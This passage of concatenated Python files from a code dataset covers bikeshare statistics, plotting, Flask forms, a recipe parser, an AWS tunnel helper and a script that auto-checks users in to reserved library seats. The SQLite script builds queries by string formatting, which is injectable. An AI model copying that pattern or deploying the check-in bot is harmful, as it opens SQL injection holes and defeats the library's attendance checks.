').strip().lower()\n    while day not in ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']:\n        day=input(\"Please try again, something in the input was incorrect \").strip().lower()\n    print(\"Thank you, the Day filter was set to {}! 
\\n\".format(day).title())\n\n print('-'*30)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.day_name()\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n print('-'*30)\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # display the most common month\n popular_month = df['month'].mode()[0]\n print('Most Popular Month:', popular_month)\n\n\n # display the most common day of week\n popular_day_of_week = df['day_of_week'].mode()[0]\n print('Most Popular day of week:', popular_day_of_week)\n\n\n # display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n popular_hour = df['hour'].mode()[0]\n print('Most Frequent Start Hour:', popular_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*30)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n popular_station_sta = df['Start Station'].mode()[0]\n print('\\nMost Common Start station:\\n', popular_station_sta)\n\n # display most commonly used end station\n popular_station_end = df['End Station'].mode()[0]\n print('\\nMost Common End station:\\n', popular_station_end)\n\n # display most frequent combination of start station and end station trip\n df['Combination_sta_end'] =\"FROM: \" + df['Start Station'] +\" TO: \"+ df['End Station']\n popular_combination_sta_end = df['Combination_sta_end'].mode()[0]\n print('\\nMost Frequent Trip (combination of start and end station):\\n', popular_combination_sta_end)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*30)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print(\"\\nTotal trip duration was \\n\", time.strftime(\"%j:%H:%M:%S\", time.gmtime(df['Trip Duration'].sum())))\n # display mean travel time\n print(\"\\nAvarage trip duration was \\n\", time.strftime(\"%H:%M:%S\", time.gmtime(df['Trip 
Duration'].mean())))\n\n    print(\"\\nThis took %s seconds.\\n\" % (time.time() - start_time))\n    print('-'*30)\n\n\ndef user_stats(df):\n    \"\"\"Displays the following statistics on bikeshare users.\n\n    #1 Popular times of travel (i.e., occurs most often in the start time)\n    most common month\n    most common day of week\n    most common hour of day\n\n    #2 Popular stations and trip\n    most common start station\n    most common end station\n    most common trip from start to end (i.e., most frequent combination of start station and end station)\n\n    #3 Trip duration\n    total travel time\n    average travel time\n\n    #4 User info\n    counts of each user type\n    counts of each gender (only available for NYC and Chicago)\n    earliest, most recent, most common year of birth (only available for NYC and Chicago)\n    \"\"\"\n\n    print('\\nCalculating User Stats...\\n')\n    start_time = time.time()\n\n    # Display counts of user types\n    print(\"\\nReport for the user types is below\")\n    user_types = df['User Type'].value_counts()\n    print(user_types)\n\n    # Display counts of gender\n    print(\"\\nReport for the Gender types is below\")\n    try:\n        gender_types = df['Gender'].value_counts()\n        print(gender_types)\n    except Exception as exception_gender:\n        print(\"\\nSorry, we could not generate this report, no such data input was found: {} \\n\" .format(exception_gender))\n\n    # Display earliest, most recent, and most common year of birth\n    print(\"\\nReport for the Birth Years is below\")\n    try:\n        min_birth_year = df['Birth Year'].min()\n        print(\"The Earliest Birth Year is : \", min_birth_year)\n        max_birth_year = df['Birth Year'].max()\n        print(\"The Most Recent Birth Year is : \", max_birth_year)\n        popular_birth_year = df['Birth Year'].mode()[0]\n        print(\"The Most common Birth Year is : \", popular_birth_year)\n    except Exception as exception_year:\n        print(\"\\nSorry, we could not generate this report, no such data input was found: {} \\n\".format(exception_year))\n\n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    print('-'*30)\n\ndef raw_decision(df):\n\n    \"\"\"Displays raw data upon request.\n    Function prompts the user if they want to see 5 lines of raw data,\n    displays the data if the answer is 'yes' and continues with the prompts\n    and displays until the user says 'no' or something else, which is not 'yes'\"\"\"\n\n    raw_decision = input(\"\\nWould you like to see 5 lines of RAW data, type yes or no?\\n\").strip().lower()\n    while raw_decision.lower() != 'no':\n        starting_point=0\n        ending_point=5\n        cont =\"yes\"\n        while cont == \"yes\":\n            print(df.iloc[starting_point:ending_point,:])\n            cont = input(\" Shall we continue, do you want to see the next five rows? Enter - yes or no?\")\n            starting_point+=5\n            ending_point+=5\n        if cont != \"yes\":\n            raw_decision = \"no\"\n    print('-'*30)\n    print(\"Thank you, that was the end of the RAW DATA report\\n\")\n\n\n\ndef main():\n    while True:\n        city, month, day = get_filters()\n        df = load_data(city, month, day)\n\n        time_stats(df)\n        station_stats(df)\n        trip_duration_stats(df)\n        user_stats(df)\n        raw_decision(df)\n\n        restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n        if restart.lower() != 'yes':\n            break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"320977043","text":"'''\nCreated on 2017. 9. 
12.\n\n@author: callor\n'''\na = [10,20,20,30,40,50,60,70]\nlabel = [\"Blue\",\"Green\",\"Red\",\"Cyan\",\"Magenta\",\"Yellow\",\"Black\",\"White\"]\n\nfrom matplotlib.pyplot import *\nfigure()\npie(a,labels=label)\n# b,g,r,c,m,y,k,w\nshow()","sub_path":"MatplotPRJ/Basic02/Pie01.py","file_name":"Pie01.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"513529271","text":"#!/usr/bin/env python\n'''\n\n  # Create database and insert 10 rows of fake data\n  $ python rdbsm.py 1 10\n\n  # Query all fake data\n  $ python rdbsm.py 2\n\n  # Delete database\n  $ python rdbsm.py 3\n\n'''\nfrom sqlite3 import connect\nfrom os.path import abspath, dirname, exists, join\n\n\nclass SQLite3(object):\n    ''' class '''\n    def __init__(self):\n\n        base_dir = dirname(abspath(__file__))\n        filename = 'messages.db'\n        self.db_fname = join(base_dir, filename)\n\n\n    def _create_table(self):\n\n        self.cursor.execute(\n            '''\n            CREATE TABLE messages (\n                ID INTEGER PRIMARY KEY,\n                name varchar(64) NOT NULL,\n                content varchar(512) NOT NULL)\n            ''')\n\n\n    def _insert_data(self, val_list):\n\n        str1 = \"INSERT INTO {}\".format('messages')\n        str2 = \"({})\".format(', '.join(['name', 'content']))\n        str3 = \"VALUES ('{}', '{}')\".format(val_list[0], val_list[1])\n\n        self.cursor.execute(\"{} {} {}\".format(str1, str2, str3))\n\n\n    def _query(self):\n\n        self.rows = self.cursor.execute(\n            '''\n            SELECT * FROM messages\n            ''')\n\n\n    def insert_database(self, create=True, val_list=None):\n\n        # Create connection object\n        self.conn = connect(self.db_fname)\n\n        # Create cursor object\n        self.cursor = self.conn.cursor()\n\n        if create:\n            # Create a table\n            self._create_table()\n\n        if isinstance(val_list, list):\n            # Insert a row of data\n            self._insert_data(val_list)\n\n        # Commit (save) the changes\n        self.conn.commit()\n\n        # Closing connection\n        self.conn.close()\n\n\n    def query_database(self):\n\n        if exists(self.db_fname):\n\n            # Create connection object\n            self.conn = connect(self.db_fname)\n\n            # Create cursor object\n            self.cursor = self.conn.cursor()\n\n            try:\n\n                # Perform query\n                self._query()\n\n                for row in self.rows:\n                    yield row\n\n            except:\n\n                # the table may not exist yet; yield nothing in that case\n                pass\n\n            # Closing connection\n            self.conn.close()\n\n\nif __name__ == '__main__':\n\n    def main_insert(n=1):\n\n        from faker import Faker\n\n        SQLdb = SQLite3()\n\n        while n > 0:\n            val_list = [Faker().name(), Faker().text()]\n            SQLdb.insert_database(not exists(SQLdb.db_fname), val_list=val_list)\n            n -= 1\n\n\n    def main_query():\n\n        SQLdb = SQLite3()\n        rows = SQLdb.query_database()\n\n        for name_id, name, content in rows:\n            print()\n            print(name_id)\n            print(name)\n            print(content)\n            print()\n\n\n    def main_delete():\n\n        from os import system\n\n        SQLdb = SQLite3()\n\n        if exists(SQLdb.db_fname):\n            system('rm -fv {}'.format(SQLdb.db_fname))\n\n\n    def main():\n\n        from sys import argv\n\n        # input arguments\n        method = 1 if len(argv) == 1 else int(argv[1])\n        n = int(argv[2]) if len(argv) == 3 else 1\n\n        # method selection\n        if method == 1:\n            main_insert(n=n)\n        elif method == 2:\n            main_query()\n        elif method == 3:\n            main_delete()\n        else:\n            print('Undefined method!')\n\n    main()\n","sub_path":"rdbsm.py","file_name":"rdbsm.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145208476","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, 
FileField, TextAreaField\nfrom wtforms.validators import DataRequired, Email, Regexp, EqualTo, ValidationError, Length\nfrom app.models import User\n\n\n# Registration form\nclass RegistForm(FlaskForm):\n    name = StringField(\n        label=\"账号\",\n        validators=[\n            DataRequired(\"账号不能为空!\")\n        ],\n        description=\"账号\",\n        render_kw={\n            \"class\": \"form-control input-lg\",\n            \"placeholder\": \"请输入登录名!\",\n        }\n    )\n    pwd = PasswordField(\n        label=\"密码\",\n        validators=[\n            DataRequired(\"密码不能为空!\")\n        ],\n        description=\"密码\",\n        render_kw={\n            \"class\": \"form-control input-lg\",\n            \"placeholder\": \"请输入密码!\",\n        }\n    )\n    repwd = PasswordField(\n        label=\"确认密码\",\n        validators=[\n            DataRequired(\"请输入确认密码!\"),\n            EqualTo('pwd', message=\"两次密码不一致!\")\n        ],\n        description=\"确认密码\",\n        render_kw={\n            \"class\": \"form-control input-lg\",\n            \"placeholder\": \"请输入确认密码!\",\n        }\n    )\n    submit = SubmitField(\n        '注册',\n        render_kw={\n            \"class\": \"btn btn-lg btn-success btn-block\",\n        }\n    )\n\n    def validate_name(self, field):\n        name = field.data\n        user = User.query.filter_by(name=name).count()\n        if user == 1:\n            raise ValidationError(\"账号已经存在!\")\n\n\nclass LoginForm(FlaskForm):\n    name = StringField(\n        label=\"账号\",\n        validators=[\n            DataRequired(\"账号不能为空!\")\n        ],\n        description=\"账号\",\n        render_kw={\n            \"class\": \"form-control input-lg\",\n            \"placeholder\": \"请输入账号!\",\n        }\n    )\n    pwd = PasswordField(\n        label=\"密码\",\n        validators=[\n            DataRequired(\"密码不能为空!\")\n        ],\n        description=\"密码\",\n        render_kw={\n            \"class\": \"form-control input-lg\",\n            \"placeholder\": \"请输入密码!\",\n        }\n    )\n    submit = SubmitField(\n        '登录',\n        render_kw={\n            \"class\": \"btn btn-lg btn-primary btn-block\",\n        }\n    )\n\n    def validate_name(self, field):\n        account = field.data\n        admin = User.query.filter_by(name=account).count()\n        if admin == 0:\n            raise ValidationError(\"账号不存在! 
\")\n\n\nclass UserdetailForm(FlaskForm):\n name = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"账号不能为空!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入账号!\",\n }\n )\n face = FileField(\n label=\"头像\",\n validators=[\n DataRequired(\"请上传头像!\")\n ],\n description=\"头像\",\n )\n submit = SubmitField(\n '保存修改',\n render_kw={\n \"class\": \"btn btn-success\",\n }\n )\n\n\nclass PwdForm(FlaskForm):\n old_pwd = PasswordField(\n label=\"旧密码\",\n validators=[\n DataRequired(\"旧密码不能为空!\")\n ],\n description=\"旧密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入旧密码!\",\n }\n )\n new_pwd = PasswordField(\n label=\"新密码\",\n validators=[\n DataRequired(\"新密码不能为空!\"),\n ],\n description=\"新密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入新密码!\",\n }\n )\n submit = SubmitField(\n '修改密码',\n render_kw={\n \"class\": \"btn btn-success\",\n }\n )\n","sub_path":"app/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625034888","text":"import os\nimport sys\n\nfrom sklearn import metrics\n\nsys.path.append('..')\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom Evals import *\nfrom util.classification_utils import get_optimal_threshold, get_prediction\nimport seaborn as sns\nfrom sklearn.metrics import roc_curve, auc, precision_recall_curve, average_precision_score\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom scipy import interp\n\nimport pandas as pd\nimport numpy as np\n\ndef bar_plot_svc(scores_tr,scores_ev,gammas,thresholds = None):\n bar_width = 0.35\n plt.xticks(np.arange(0,20)+bar_width/2,range(0,20))\n bar1 = plt.bar(gammas,scores_tr,bar_width,label='Train',alpha=.5,color='b')\n bar2 = plt.bar(gammas+bar_width,scores_ev,bar_width,label='Ev',alpha=.5,color='r')\n plt.hlines(.5,0,max(gammas)+1,linestyle='dashed',alpha=.2)\n #plt.plot(np.arange(0,15),[.5]*15,'--',color='k')\n plt.xlabel('Dim')\n plt.ylabel('F1 Score')\n plt.xlim(0,max(gammas)+1)\n plt.ylim(0,1)\n plt.legend()\n\n # Add thresholds above the two bar graphs\n if thresholds:\n for idx,rects in enumerate(zip(bar1,bar2)):\n higher=np.argmax([rects[0].get_height(),rects[1].get_height()])\n rect=rects[higher]\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()-(higher/2.), height, '%.2f' % thresholds[idx], ha='center', va='bottom') \n plt.show()\n\ndef plot_svc(scores_tr,scores_ev,hyper,label='Hyperpara'):\n plt.scatter(hyper,scores_tr,label='Train')\n plt.scatter(hyper,scores_ev, label='Ev')\n plt.legend()\n plt.title('F1 Score')\n plt.xlabel(label)\n plt.ylabel('F1 - Score')\n plt.ylim(0,1)\n plt.show()\n\n# def conf_mat(pred,true, title):\n# tp,fp,fn,tn = get_pos_and_negs(pred,true)\n# rates = np.array([tp,fp,fn,tn]).reshape((2,2))\n# df_cm = pd.DataFrame(rates, index = ['Pred Happy','Pred Not Happy'],columns = ['True Happy','True Not Happy'])\n# plt.figure(figsize = (10,7))\n# sn.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n# plt.title(title)\n# plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n# plt.show()\n\ndef conf_mat(pred, true, title):\n tn,fp,fn,tp = metrics.confusion_matrix(true, pred).ravel()\n rates = np.array([tp,fp,fn,tn]).reshape((2,2))\n df_cm = pd.DataFrame(rates, index = ['Pred Happy','Pred Not Happy'],columns = ['True 
Happy','True Not Happy'])\n plt.figure(figsize = (10,7))\n sns.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n plt.title(title)\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\ndef score_heatmap(pred, true, title):\n met_dict = metrics.classification_report(true, pred, output_dict=True)\n df = pd.DataFrame(met_dict)\n del df['weighted avg']\n acc = df['accuracy'].values\n del df['accuracy']\n df.loc[len(df)] = [np.nan]*2+[acc[0]]\n df.rename(columns={'macro avg':'Total', 0.0:'Not happy', 1.0:'Happy'}, index={4:'accuracy'},inplace=True)\n plt.figure(figsize = (10,7))\n sns.heatmap((df.T).round(2),annot=True,cmap='Reds', fmt='g', vmin = 0,vmax=1, annot_kws={\"size\": 22})\n plt.yticks(rotation=0, fontsize=\"10\", va=\"center\")\n plt.title(title)\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\ndef plot_roc(x,y,classifier, title): #the classifier has to be pretrained here!!\n cv = StratifiedKFold(n_splits=10, shuffle=False)\n tprs = []\n aucs = []\n fpr_interval = np.linspace(0, 1, 100)\n i = 0\n for train, test in cv.split(x, y):\n probas_ = classifier.predict_proba(x[test])\n # Compute ROC curve and area the curve\n #this returns different tpr/fpr for different decision thresholds\n fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])\n curr_interp = interp(fpr_interval, fpr, tpr)\n tprs.append(curr_interp)\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n i += 1\n\n plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Chance', alpha=.8)\n\n mean_interpol_tpr = np.mean(tprs, axis=0)\n mean_interpol_auc = auc(fpr_interval, mean_interpol_tpr)\n std_auc = np.std(aucs)\n plt.plot(fpr_interval, mean_interpol_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_interpol_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_interpol_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_interpol_tpr - std_tpr, 0)\n plt.fill_between(fpr_interval, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. 
dev.')\n\n    plt.xlim([-0.05, 1.05])\n    plt.ylim([-0.05, 1.05])\n    plt.xlabel('False Positive Rate')\n    plt.ylabel('True Positive Rate')\n    plt.title(title)\n    plt.legend(loc=\"lower right\")\n    plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n    plt.show()\n    plt.close()\n\n\ndef plot_pr_curve(x, y, classifier, title):\n    y_probs = classifier.predict_proba(x)\n    avg_p = average_precision_score(y,y_probs[:,1]) #get the average precision score\n    precision, recall, _ = precision_recall_curve(y, y_probs[:,1])\n    #step_kwargs = ({'step': 'post'}\n    #               if 'step' in signature(plt.fill_between).parameters\n    #               else {})\n    step_kwargs = ({'step': 'post'})\n    plt.step(recall, precision, color='b', alpha=0.2,\n             where='post')\n    plt.fill_between(recall, precision, alpha=0.2, color='b', **step_kwargs)\n\n    plt.xlabel('Recall')\n    plt.ylabel('Precision')\n    plt.ylim([0.0, 1.05])\n    plt.xlim([0.0, 1.0])\n    plt.title(title + ', AP={0:0.2f}'.format(\n        avg_p))\n    plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n    plt.show()\n    plt.close()\n\n\n# def _background_gradient(s, m, M, cmap='PuBu', low=0, high=0):\n#     rng = M - m\n#     norm = colors.Normalize(m - (rng * low),\n#                             M + (rng * high))\n#     normed = norm(s.values)\n#     c = [colors.rgb2hex(x) for x in plt.cm.get_cmap(cmap)(normed)]\n#     return ['background-color: %s' % color for color in c]\n#\n#\n#\n# def print_results(df_res):\n#     pretty = df_res.style.apply(_background_gradient,\n#                                 cmap='PuBu',\n#                                 m=df_res.min().min(),\n#                                 M=df_res.max().max(),\n#                                 low=0,\n#                                 high=1)\n#     print(pretty)\n#\n \n \n\"\"\"\nFunction to plot an average ROC curve, given many random trials of shuffled labels.\nCurrently only works with Random Forest.\nInput: pandas df, where each row contains the best hyperparas, the PR result and the shuffled y, y_ev, x, x_ev\n\"\"\"\n\n\ndef plot_roc_random(df, title, train = True): \n    tprs = []\n    aucs = []\n    fpr_interval = np.linspace(0, 1, 100)\n    i = 0\n    for idx, row in df.iterrows():\n        classifier = RandomForestClassifier(n_estimators=int(row['Number Estimators']), max_depth=int(row['Max Depth']), max_features=int(row['Max Features']), random_state=0)\n        y = row['y']\n        y_ev = row['y_ev']\n        x = row['x']\n        x_ev = row['x_ev']\n        classifier.fit(x,y)\n        if train:\n            probas_ = classifier.predict_proba(x)\n            # Compute ROC curve and area the curve\n            #this returns different tpr/fpr for different decision thresholds\n            fpr, tpr, thresholds = roc_curve(y, probas_[:, 1])\n        else:\n            probas_ = classifier.predict_proba(x_ev)\n            # Compute ROC curve and area the curve\n            #this returns different tpr/fpr for different decision thresholds\n            fpr, tpr, thresholds = roc_curve(y_ev, probas_[:, 1])\n        curr_interp = interp(fpr_interval, fpr, tpr)\n        tprs.append(curr_interp)\n        tprs[-1][0] = 0.0\n        roc_auc = auc(fpr, tpr)\n        aucs.append(roc_auc)\n        i += 1\n\n\n    plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n             label='Chance', alpha=.8)\n\n\n    mean_interpol_tpr = np.mean(tprs, axis=0)\n    mean_interpol_auc = auc(fpr_interval, mean_interpol_tpr)\n    std_auc = np.std(aucs)\n    plt.plot(fpr_interval, mean_interpol_tpr, color='b',\n             label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_interpol_auc, std_auc),\n             lw=2, alpha=.8)\n\n    std_tpr = np.std(tprs, axis=0)\n    tprs_upper = np.minimum(mean_interpol_tpr + std_tpr, 1)\n    tprs_lower = np.maximum(mean_interpol_tpr - std_tpr, 0)\n    plt.fill_between(fpr_interval, tprs_lower, tprs_upper, color='grey', alpha=.2,\n                     label=r'$\\pm$ 1 std. 
dev.')\n\n    plt.xlim([-0.05, 1.05])\n    plt.ylim([-0.05, 1.05])\n    plt.xlabel('False Positive Rate')\n    plt.ylabel('True Positive Rate')\n    plt.title(title)\n    plt.legend(loc=\"lower right\")\n    plt.show()\n\n\ndef conf_mat_random(df, train):\n    count = 0\n    res = np.zeros(4)\n    pr = 0\n    rec = 0\n    f1 = 0\n    for idx, row in df.iterrows():\n        classifier = RandomForestClassifier(n_estimators=int(row['Number Estimators']), max_depth=int(row['Max Depth']), max_features=int(row['Max Features']), random_state=0)\n        y = row['y']\n        y_ev = row['y_ev'] \n        x = row['x']\n        x_ev = row['x_ev']\n        classifier.fit(x,y)\n        best_thr = get_optimal_threshold(classifier, x, y, go_after_pr=True) # get threshold using cv (on whole dataset)\n        y_pred = get_prediction(classifier, x, best_thr) # using that threshold, get predictions and f1 score\n        y_pred_ev = get_prediction(classifier, x_ev, best_thr) # using that threshold, get predictions and f1 score\n        \n        if train:\n            res += np.array(get_pos_and_negs(y_pred,y))\n            p,r = get_precision_recall(y_pred,y)\n            f = get_f1(y_pred,y)\n            f1 += f\n            pr += p\n            rec += r\n        else:\n            res += np.array(get_pos_and_negs(y_pred_ev,y_ev))\n            p,r = get_precision_recall(y_pred_ev,y_ev)\n            f = get_f1(y_pred_ev,y_ev)\n            f1 += f\n            pr += p\n            rec += r\n        count += 1\n    if train:\n        print('Train')\n    else:\n        print('Eval')\n    print('Avg. Precision {0:.3f}, Avg. Recall {1:.3f}, Avg. F1 {2:.3f}'.format(pr/count,rec/count,f1/count))\n    df_cm = pd.DataFrame(res.reshape(2,2)/count, index = ['Pred Happy','Pred Not Happy'],columns = ['True Happy','True Not Happy'])\n    plt.figure(figsize = (10,7))\n    sns.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n    plt.show()\n    return pr/count,rec/count,f1/count\n\n    \n    \ndef happy_ratio_random(df):\n    new_df = pd.DataFrame(columns = ['Happy', 'Train', 'Test'])\n\n    for idx, row in df.iterrows():\n        new_df.loc[2*idx] = [True,np.sum(row['y']),np.sum(row['y_ev'])]\n        new_df.loc[2*idx+1] = [False,len(row['y'])-np.sum(row['y']),len(row['y_ev'])-np.sum(row['y_ev'])]\n\n    llel = new_df.melt(id_vars = 'Happy',value_vars = ['Train','Test'])\n\n    llel['value'] = llel['value'].astype('int')\n    llel['Happy'] = llel['Happy'].astype('bool')\n\n    sns.set()\n\n    sns.violinplot(x='variable',data=llel,y='value',hue='Happy',split=True, hue_order =[True,False], palette = {True:'blue', False:'red'} )\n    plt.title('Violin Plot of Happy/Not Happy distribution')\n    plt.ylabel('Counts')\n    plt.xlabel('Dataset')\n    plt.show()\n","sub_path":"vis/classification_vis.py","file_name":"classification_vis.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54608973","text":"from BeautifulSoup import BeautifulSoup\nimport re\nfrom RecipeParser import RecipeParser\n\nclass FoodNetworkParser(RecipeParser):\n    def __init__(self, pagedata):\n        self._ingredients = []\n        self._directions = []\n        self._title = \"\"\n        self._author = \"\"\n        soup = BeautifulSoup(pagedata)\n        self._title = soup('h1', { 'class' : \"fn\" })[0].string\n        self._author = soup('p', { 'class' : 'author'})[0].a.string\n        lists = soup('ul', { 'class' : re.compile('kv-ingred-list[0-9]') })\n        for ul in lists:\n            items = ul.fetch('li')\n            tmp = []\n            for li in items:\n                tmp.append(li.string)\n            self._ingredients.append(tmp)\n        values = soup('div', { 'class' : 'instructions' })\n        for val in values:\n            paras = val.fetch('p')\n            tmp = []\n            for para in paras:\n                tmp.append(para.string)\n            self._directions.append(tmp)\n# vim: tabstop=4 expandtab shiftwidth=4 
softtabstop=4\n","sub_path":"FoodNetworkParser.py","file_name":"FoodNetworkParser.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"52927741","text":"import requests\nimport time\nimport json\nimport sys\nimport threading\nLogIn_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/wechatIndex?type=index&\"\nGuard_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/getUserBookHistory\"\nCheck_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/checkIn?bookId=\"\ndef guard(stu):\n    session = requests.session()\n    session.get(LogIn_URL + stu['url'])\n    resp = session.get(Guard_URL)\n    res_json = resp.json()\n    if res_json[\"params\"][\"history\"][0][\"stat\"] == \"RESERVE\":\n        temp = session.get(Check_URL)\n        print(stu[\"nickname\"],temp.json()[\"content\"])\n\n\nif __name__ == '__main__':\n    filename = \"new.json\"\n    start = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n    print(' '+start)\n    f = open(sys.path[0] + '/' + filename, 'r', encoding='utf8')\n    info = json.load(f)\n    for i in info['stu']:\n        task = threading.Thread(target=guard, args=(i,))\n        task.start()\n","sub_path":"Punch.py","file_name":"Punch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"115821592","text":"#!/usr/bin/env python\n# -*- encoding: utf-8\n\"\"\"\nConnect to the first instance in an autoscaling group.\n\nUsage: create_tunnel_to_asg.py [--key=<key>] [--port=<port>] [--type=(p2 | t2)] [--namespace=<namespace>]\n\nActions:\n  --key=<key>             Path to an SSH key with access to the instances in the ASG.\n  --port=<port>           Local port to use for the remote Jupyter notebook\n                          (default: 8888).\n  --type=(p2 | t2)        AWS Instance type (valid values: p2,t2) defaults to t2\n\n\"\"\"\n\nimport os\nimport subprocess\nimport sys\nimport time\n\nfrom os.path import expanduser\n\nimport boto3\nimport docopt\n\nfrom asg_utils import discover_asg\n\n\ndef _default_ssh_key_path():\n    return \"%s/.ssh/wellcomedigitalplatform\" % expanduser(\"~\")\n\n\ndef _wait(message, wait=5):\n    print(\"%s; waiting for %d seconds...\" % (message, wait))\n    time.sleep(wait)\n\n\ndef main():\n    args = docopt.docopt(__doc__)\n\n    key_path = args[\"--key\"] or _default_ssh_key_path()\n    namespace = args[\"--namespace\"] or \"notebook\"\n\n    print(\"Using SSH key at path %r\" % key_path)\n\n    assert os.path.exists(key_path)\n\n    port = args[\"--port\"] or \"8888\"\n\n    instance_type = args[\"--type\"] or \"t2\"\n    tag_name = \"jupyter-%s-%s\" % (instance_type, namespace)\n\n    asg_client = boto3.client(\"autoscaling\")\n\n    while True:\n        asg_data = discover_asg(asg_client=asg_client, tag_name=tag_name)\n\n        if not asg_data[\"Instances\"]:\n            _wait(\"No instances in ASG group %r\" % asg_data[\"AutoScalingGroupName\"])\n            continue\n\n        in_service_instances = [\n            inst\n            for inst in asg_data[\"Instances\"]\n            if inst[\"LifecycleState\"] == \"InService\"\n        ]\n\n        if not in_service_instances:\n            _wait(\n                'No instances in ASG group %r are \"InService\"'\n                % asg_data[\"AutoScalingGroupName\"]\n            )\n            continue\n\n        assert len(in_service_instances) > 0\n        break\n\n    instance_data = in_service_instances[0]\n    instance_id = instance_data[\"InstanceId\"]\n\n    print(\"Looking up EC2 instance ID %r\" % instance_id)\n\n    ec2_client = boto3.client(\"ec2\")\n    resp = ec2_client.describe_instances(InstanceIds=[instance_id])\n\n    try:\n        instances = resp[\"Reservations\"][0][\"Instances\"]\n        ec2_data = instances[0]\n        assert 
